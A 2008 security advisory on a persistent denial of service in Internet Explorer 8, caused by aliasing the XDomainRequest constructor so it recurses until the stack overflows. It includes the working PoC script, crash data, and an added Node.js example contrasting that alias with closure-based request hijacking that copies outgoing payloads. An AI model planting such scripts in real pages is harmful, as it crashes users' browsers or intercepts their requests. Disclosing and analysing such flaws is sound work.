Internet Explorer 8 XDR Persistent DoS.

Published on: 1206887950 (Unix timestamp, 30 March 2008)
Abstract.



Internet Explorer 8 is vulnerable to prototype hijacking, or rather function aliasing, on the XDR object. The XDomainRequest object is a new feature in Internet Explorer 8 that allows cross-domain XML calls. By default the feature only allows a cross-domain call when both parties agree on the request: the host to which the request is made must append XDomainRequestAllowed to its response headers. Since this is a very powerful, and therefore dangerous, object, I explored the new feature to review its security a little more closely. It did not take long to find a serious issue: aliasing the XDomainRequest constructor leads to a denial of service through a stack overflow, which can only be recovered from after a full OS reboot. The reason it is persistent is the feature in Internet Explorer 8 that tries to re-create a session window when a window crashes. This happens automatically, without user intervention, so the crashing page is reloaded and the denial of service repeats.



The problem.



It is similar to the prototype hijacking of XMLHttpRequest first described by Stefano Di Paola in 2006 [1], with the difference that it triggers a denial of service instead of a hijacked request. I replace the global XDomainRequest constructor with a function that instantiates a new XDR object, which I think amounts to function aliasing. Because the replacement itself calls `new XDomainRequest()`, and by then XDomainRequest refers to the replacement, every instantiation re-enters the function and the recursion never ends. Internet Explorer chokes on it and crashes the window we work in. Then Internet Explorer tries to re-open the window, see figure 1.



Figure 1.

As seen in figure 2, trying to shut down iexplore.exe from the Windows Task Manager results in a new browser being launched that re-creates the window session. After killing that one, Internet Explorer instantiates yet another browser, which hangs again, and so on.



Figure 2.

It almost behaves like a Trojan that cannot be killed :)



The attack vector.



<script>
// Trying prototype hijacking here: alias the XDomainRequest constructor.
// This keeps a reference to the original constructor, but the variable is
// overwritten further down, so the original is never used again.
xdr = XDomainRequest;

// Replace the global constructor. Inside the function, XDomainRequest now
// refers to this replacement, so `new XDomainRequest()` calls the function
// again: unbounded recursion, i.e. a stack overflow.
XDomainRequest = function() {
    return new XDomainRequest();
}

ping = 'hello';

// The first instantiation triggers the recursion; open() and send() are
// never reached.
xdr = new XDomainRequest();
xdr.open("POST", "http://cnn.com");
xdr.send(ping);
</script>
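To make the mechanism described in the problem section and in the PoC above concrete, here is an added example that is not part of the original advisory. It runs offline in Node.js against a constructed stand-in for IE8's XDomainRequest (the real object only exists in Internet Explorer 8), and contrasts the self-referential alias from the PoC, which re-enters itself until the engine runs out of stack, with the closure-based aliasing of [1], which keeps the original constructor and intercepts send() without recursing. FakeXDomainRequest, runSelfReferentialAlias and runClosureAlias are names chosen for this example, globalThis stands in for IE8's window object, and the RangeError that V8 raises stands in for the ieframe.dll crash the advisory observed.

```javascript
// Added example, not from the original advisory. Node.js, runs offline.
// globalThis stands in for IE8's window object.

// Constructed stand-in for IE8's XDomainRequest: it just records calls.
function FakeXDomainRequest() {
  this.log = [];
}
FakeXDomainRequest.prototype.open = function (method, url) {
  this.log.push("open " + method + " " + url);
};
FakeXDomainRequest.prototype.send = function (body) {
  this.log.push("send " + body);
};

// Case 1: the advisory's PoC. The replacement constructor calls
// `new XDomainRequest()`, but by the time it runs, XDomainRequest *is* the
// replacement, so every call re-enters itself. The recursion only stops when
// the engine runs out of stack: V8 throws a RangeError, IE8 crashed.
function runSelfReferentialAlias() {
  globalThis.XDomainRequest = FakeXDomainRequest;
  let depth = 0;
  globalThis.XDomainRequest = function () {
    depth++;
    return new globalThis.XDomainRequest(); // resolves to this same function
  };
  try {
    new globalThis.XDomainRequest();
    return { overflowed: false, depth: depth };
  } catch (e) {
    return { overflowed: e instanceof RangeError, depth: depth };
  } finally {
    globalThis.XDomainRequest = FakeXDomainRequest; // undo the alias
  }
}

// Case 2: the same hook written the way the XMLHttpRequest prototype
// hijacking in [1] does it. The original constructor is captured in a
// closure once, so the wrapper can build a real object and intercept send()
// without ever calling itself: a hijacked request instead of a DoS.
function runClosureAlias() {
  globalThis.XDomainRequest = FakeXDomainRequest;
  const intercepted = [];
  const OriginalXDR = globalThis.XDomainRequest; // the reference the PoC overwrote
  globalThis.XDomainRequest = function () {
    const real = new OriginalXDR();
    const realSend = real.send;
    real.send = function (body) {
      intercepted.push(body); // attacker's copy of the outgoing payload
      return realSend.call(real, body);
    };
    return real; // returning an object from a constructor replaces `this`
  };
  const xdr = new globalThis.XDomainRequest();
  xdr.open("POST", "http://cnn.com");
  xdr.send("hello");
  globalThis.XDomainRequest = FakeXDomainRequest; // undo the alias
  return { intercepted: intercepted, log: xdr.log };
}

// Stand-alone usage: the PoC's alias overflows, the closure alias intercepts.
console.log(runSelfReferentialAlias());
console.log(runClosureAlias());
```

The difference between the two cases is a single saved reference: the PoC saves the original constructor in `xdr` and then overwrites that variable, so nothing inside the replacement can reach the real object any more, and the only thing left for it to call is itself.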




Crash data:





AppName: iexplore.exe AppVer: 8.0.6001.17184 ModName: ieframe.dll

ModVer: 8.0.6001.17184 Offset: 0003f8cb





In figure 3 I perform a live trace on ieframe.dll with Auto-Debug to see what happened. The trace covers Internet Explorer starting up, the window being resized and navigated, and the exploit being launched. Thread 000001F0 shows the exploit executing, which results in a stack overflow.



Figure 3.


Conclusion.



More research is needed on the XDR object to fully grasp the risk of this new feature. The attack and PoC described here were performed with browserfry [2], and results may vary.



References:



[1] Stefano Di Paola, Subverting Ajax - http://www.wisec.it/docs.php?id=4 (PDF file)

[2] browserfry - http://browserfry.0x000000.com